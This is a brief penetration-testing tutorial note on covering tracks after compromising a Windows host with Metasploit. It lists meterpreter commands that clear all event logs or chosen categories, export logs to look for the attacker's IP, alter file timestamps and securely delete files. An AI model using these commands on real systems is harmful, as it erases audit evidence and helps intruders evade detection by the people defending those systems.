covering_tracks
We can delete all logs by doing
clearev
Anyway this can be suspicious, so we can selectively delete logs, for example:
run event_manager -h run event_manager -i # shows the type of logs we can delete run event_manager -c "Windows Powershell" # clears all windows powershell logs run event_manager -l Application # lists the logs related to the "Application" category run event_manager -l Application -s /tmp/ApplicationLogs.txt # saves the logs to our machine so that we can inspect them more comfortably
Once we have these logs we can open them for example with libreoffice calc or equivalent software and search for our IP (attacker) address, if it is there, then we can proceed with the removal of the entire Application logs.
Notice that at the current version of metasploit we cannot remove single entries in logs, we can just remove categories (or sections).
We may also need to change timestamp of files with the timestamp
command or
shred a file.
Indeed in the case we want to remove a file and be sure nobody could retrieve it
we should use sdel
.